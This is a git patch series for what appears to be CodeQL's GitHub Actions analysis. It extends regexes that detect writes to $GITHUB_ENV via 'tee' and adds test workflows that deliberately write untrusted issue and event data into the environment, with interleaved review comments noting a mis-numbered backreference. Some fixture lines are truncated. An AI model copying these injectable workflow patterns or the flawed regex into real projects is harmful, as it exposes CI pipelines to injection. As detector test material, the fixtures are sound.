Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref 'v1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | From c9b7340718863d318202253286f5c5bb71edb2ad Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:38:46 +0200 Subject: [PATCH 0442/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b4..856fbaebb19 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f0946..73dff5a1dc8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript From def170425af2e3553523964640572a6f4a3e2083 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 11:43:48 +0200 Subject: [PATCH 0443/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 856fbaebb19..dff01f80f2b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.28 +version: 0.1.29 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 73dff5a1dc8..1070a8e9a97 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.28 +version: 0.1.29 groups: [actions, queries] suites: codeql-suites extractor: javascript From f457537b34e36559e621081691375a14cad0db49 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 1 Aug 2024 17:47:23 +0200 Subject: [PATCH 0444/1267] feat(bash): Add support for tee as a way to write to GITHUB special files --- ql/lib/codeql/actions/Helper.qll | 22 +- .../.github/workflows/multiline2.yml | 89 ++++++ .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.expected | 265 +++++++++++++++++- 4 files changed, 366 insertions(+), 12 deletions(-) create mode 100644 ql/test/library-tests/.github/workflows/multiline2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index cd964a6621d..f177c645dbd 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -74,9 +74,10 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = + "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and content = script.regexpCapture(regexp, 2) ) @@ -100,18 +101,19 @@ predicate singleLineWorkflowCmd(string script, string cmd, string key, string va bindingset[script] predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?msi).*^(cat)\\s*(>>|>)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 3)) and - content = script.regexpCapture(regexp, 5) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and filters = "" or regexp = - "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and cmd = script.regexpCapture(regexp, 1) and - file = trimQuotes(script.regexpCapture(regexp, 6)) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and filters = script.regexpCapture(regexp, 4) and - content = script.regexpCapture(regexp, 7) + content = script.regexpCapture(regexp, 8) ) } 
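Review bot: The `tee` alternative in `singleLineFileWrite` allows only an optional `-a`/`--append` directly before the target, so any other option or a `--` separator is captured as `file` (for `... | tee -i -a $GITHUB_ENV` the captured file would be `-i`), and the write to the special file would presumably go unreported. `tee\\s*` also accepts no whitespace after the command name. Requiring `tee\\s+` and skipping option words, e.g. `tee\\s+(?:-\\S+\\s+)*`, would close that gap, and keeping the new group non-capturing would leave `file` at capture 4. The same sub-pattern is repeated in the `heredocFileWrite` hunk that follows and in the `blockFileWrite` hunk at `@@ -142,13 +144,13 @@`. The predicate's closing brace falls outside the hunk.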
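Review bot: In the first `heredocFileWrite` pattern the backreference was not renumbered along with the captures. Adding `(-a|--append)` makes the file capture 4 and the heredoc delimiter capture 5, but the terminator is still `\n\\4\\s*$`, so the pattern now looks for a closing line equal to the file name rather than the delimiter. Heredocs of the form `cat > issue.txt << EOL ... EOL` would then stop matching; the terminator should read `\n\\5\\s*$.*`. The second pattern is unaffected because its delimiter stays at capture 3, and a non-capturing `(?:-a|--append)?` would avoid this kind of index drift altogether.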
@@ -142,13 +144,13 @@ predicate blockFileWrite(string script, string cmd, string file, string content, // "(.*?)" + // - "(\\s*\\}\\s*(>>|>)\\s*(\\S+))\\s*$.*" and + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and content = script .regexpCapture(regexp, 1) .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and cmd = "echo" and filters = "" ) diff --git a/ql/test/library-tests/.github/workflows/multiline2.yml b/ql/test/library-tests/.github/workflows/multiline2.yml new file mode 100644 index 00000000000..1941dd8f22a --- /dev/null +++ b/ql/test/library-tests/.github/workflows/multiline2.yml 
@@ -0,0 +1,89 @@ +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Test: + runs-on: ubuntu-latest + steps: + - run: | + echo "changelog< event.json + ${{ toJson(github.event) }} + EOF + - name: heredoc11 + run: | + cat | tee -a $GITHUB_ENV << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc12 + run: | + cat > issue.txt << EOL + ${ISSUE_BODY} + FOO + EOL + - name: heredoc21 + run: | + cat << EOL | tee -a $GITHUB_ENV + ${ISSUE_BODY} + FOO + EOL + - name: heredoc22 + run: | + cat < file.txt + Hello + World + EOF + - name: heredoc23 + run: | + cat <<-EOF | tee -a "$GITHUB_ENV" + echo "FOO=$TITLE" + EOF + - name: line1 + run: | + echo REPO_NAME=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') | tee -a $GITHUB_ENV + - name: multiline1 + run: | + echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> 
$GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | @@ -149,6 +183,7 @@ runExprs | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | 
@@ -173,6 +208,31 @@ runStepChildren | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| 
.github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | | .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
@@ -278,6 +338,108 @@ parentNodes | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:3:17:3:22 | Prev | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:2:14 | workflow_run | +| .github/workflows/multiline2.yml:5:9:5:17 | completed | .github/workflows/multiline2.yml:2:3:5:18 | workflow_run: | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step 
| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:40:15:40:23 | 
heredoc12 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| 
.github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| 
.github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| 
.github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e 
"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | 
@@ -928,6 +1158,38 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | 